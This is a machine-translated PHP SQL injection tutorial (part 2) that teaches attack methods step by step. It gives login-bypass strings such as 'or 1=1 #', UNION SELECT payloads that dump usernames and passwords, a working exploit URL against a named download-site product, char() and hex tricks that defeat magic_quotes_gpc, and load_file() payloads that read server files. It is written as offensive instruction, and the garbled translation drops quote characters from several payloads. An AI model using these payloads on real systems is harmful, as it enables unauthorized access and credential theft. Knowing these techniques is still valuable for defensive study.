Home >Backend Development >PHP Tutorial >PHP injection solution (2)_PHP tutorial
Let’s build the injection statement
Enter
in the input box
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# is placed in the sql statement and becomes
select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %
How about it, come out, haha, everything is under control.
C: Let’s take a look at various injection attack methods from the injection location
1) First let’s take a look at the background login
CodeFirst
//login.php
.......
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "Backend login successful";
}
esle
{
echo "Re-login";
exit;
}
..........
?>
Username and password are directly put into SQL for execution without any processing.
See how we can get around it?
The most classic one is still the one:
Enter
in both the username and password boxes
‘or =
Bring it into the sql statement and become
select * from alphaauthor where UserName= or = and Password= or =
The $data obtained in this way must be true, which means we have successfully logged in.
There are also other bypassing methods . The principle is the same, just find a way to make $data return true.
We can use the following methods
1.
Enter both username and password or a = a
Sql became
select * from alphaauthor where UserName= or a = a and Password=
or a = a
2.
Enter both username and password or 1=1 and ‘ =
Sql became
select * from alphaauthor where UserName= or 1=1 and ‘ =
and Password= or 1=1 and ‘ =
Enter both username and password or 2>1 and ‘ =
Sql became
select * from alphaauthor where UserName= or 2>1 and ‘ =
and Password= or 2>1 and ‘ =
3.
Enter the username or 1=1 # Enter the password as you like
Sql became
select * from alphaauthor where UserName= or 1=1 # and
Password= anything
The latter part has been commented out, but of course the return is still true.
4.
Assuming admin's id=1, you can also
Enter username or id=1 # Enter password as you like
Sql became
select * from alphaauthor where UserName= or id=1 # and Password= anything
How about it? Log in directly!
As the saying goes, nothing is impossible unless you can imagine it.
There are more construction methods waiting for you to think about after class.
2) The second commonly used injection place should be the place where the front-end data is displayed.
It has been mentioned many times above, and it involves numeric types, character types, etc., so I won’t repeat it here.
Just to review with an example
Bihai Chaosheng Download Site - v2.0.3 lite has an injection vulnerability, the code is no longer listed
See the results directly
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%
20dl_users
Look, we got what we wanted again
Username alpha
A long list of passwords.
Why do we put the password in the 3 field and the username in the 5 field? We have already mentioned it above. We guess that the 3 and 5 paragraphs should be displayed in string type, which is different from the username we want to display. The field type should be the same as password, so we put it like this.
Why use 18 fields? I don’t know if you still remember that in the introduction of union select, we mentioned that union must require the same number of fields in the before and after selects. We can guess that 18 fields are needed by increasing the number of selects. Only in this way will the content of union select be displayed normally. oh!
3) For other information modifications, the place where users register must have user-level applications.
We have already mentioned update and insert when describing them above. Since they are not very commonly used, we will not elaborate on them here. In the following, we will mention some advanced utilization techniques of update and insert.
2: Now we are about to enter the injection attack teaching session when magic_quotes_gpc=On
When magic_quotes_gpc=On, all the (single quotes) in the variables to be crossed,
" (double quote), (backslash) and null characters are automatically converted to escape characters containing backslashes.
This makes the character injection method come to nothing. At this time, we can only inject numeric types without
Intval() handles the situation. We have already talked about numeric types a lot, right? Since numeric types do not use single quotes, there is no problem of bypassing them. In this case, we can just inject them directly.
1) If it is a character type, it must be like the following, without quotation marks around the characters.
Here we need to use some string processing functions first,
There are many string processing functions. Here we mainly talk about the following ones. For details, please refer to mysqlChinese Reference Manual 7.4.10.
char() interprets the arguments as integers and returns a string consisting of the ASCII code characters of these integers.
Of course, you can also use the hexadecimal number of the character to replace the character. This is also possible. The method is to add 0x in front of the hexadecimal number. You will understand by looking at the example below.
//login.php
…
$query="select * from ".$art_system_db_table[ user ]."
where UserName=$username and Password= ".$Pw." ";
......
?>
Suppose we know that the username in the background is alpha
After conversion to ASCII, it is char(97,108,112,104,97)
Converted to hexadecimal is 0x616C706861
Okay, just type it in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The sql statement becomes:
select * from alphaAut
hor where UserName=char(97,108,112,104,97)# and Password=
As we expected, he executed smoothly and we got what we wanted.
Of course, we can also construct it like this
http://localhost/site/admin/login.php?username=0x616C706861%23
The sql statement becomes:
select * from alphaAuthor where UserName=0x616C706861%23# and Password=
Once again we are winners. It feels like a great achievement,
Maybe you will ask us if we can also put # in char()
In fact char(97,108,112,104,97) is equivalent to alpha
Note that alpha is enclosed in quotes, indicating the alpha string.
We know that in mysql if we execute
mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column alpha in where clause
See the error returned. Because he will think that alpha is a variable. So we have to put quotes around alpha.
As follows
mysql> select * from dl_users where username= alpha;
This is correct.
If you put the # sign there, it becomes alpha#
Bring it into the sql statement
select * from dl_users where username= alpha# ;
Of course there is nothing, because there is not even the user alpha#.
Okay, let’s look at another example,
//display.php
…
$query="select * from ".$art_system_db_table[ article ]."
where type=$type;
......
?>
The code displays content according to type. $type does not have any filtering and is not put in quotes in the program.
Assume that type contains the xiaohua class, xiaohua’s char() is converted to
char(120,105,97,111,104,117,97)
We build
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Bring it into the sql statement:
select * from ".$art_system_db_table[ article ]."
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Look, our username and password are still there! There is no screenshot, just imagine it: P
2) Someone may ask, can the powerful load_file() still be used when magic_quotes_gpc=On?
This is exactly the problem we are going to solve below. The usage format of load_file() is load_file(‘file path)
We found that we only need to convert the 'file path' into char(). Give it a try
load_file(‘c:/boot.ini) is converted into
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Figure 22
Just put it in the specific injection
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,load_file(char
(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18
Look, we have seen the contents of boot.ini.
It's a pity that into outfile cannot be bypassed, otherwise it would be even more fun. But there is still a place where you can use select * from table into outfile, that is.... (Let me give you a hint first, I will tell you below)